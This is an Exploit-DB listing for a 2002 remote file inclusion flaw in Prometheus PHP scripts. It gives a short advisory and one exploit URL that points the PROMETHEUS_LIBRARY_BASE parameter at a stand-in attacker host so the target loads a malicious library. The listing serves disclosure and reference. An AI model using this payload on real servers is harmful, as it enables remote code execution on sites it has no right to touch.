Lucene search

K
exploitdbKarol WiesekEDB-ID:21976
HistoryNov 01, 2002 - 12:00 a.m.

Jason Orcutt Prometheus 3.0/4.0/6.0 - Remote File Inclusion

2002-11-0100:00:00
Karol Wiesek
www.exploit-db.com
55

AI Score

7.4

Confidence

Low

source: https://www.securityfocus.com/bid/6087/info

Prometheus is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. This issue is present in several PHP script files provided with Prometheus. An attacker may exploit this by supplying a path to a malicious 'autoload.lib' file on a remote host as a value for the 'PROMETHEUS_LIBRARY_BASE' parameter. 

http://target.server/prometheus-all/index.php?PROMETHEUS_LIBRARY_BASE=
http://attackers.server/&PHP_AUTO_LOAD_LIB=0 

AI Score

7.4

Confidence

Low

Related for EDB-ID:21976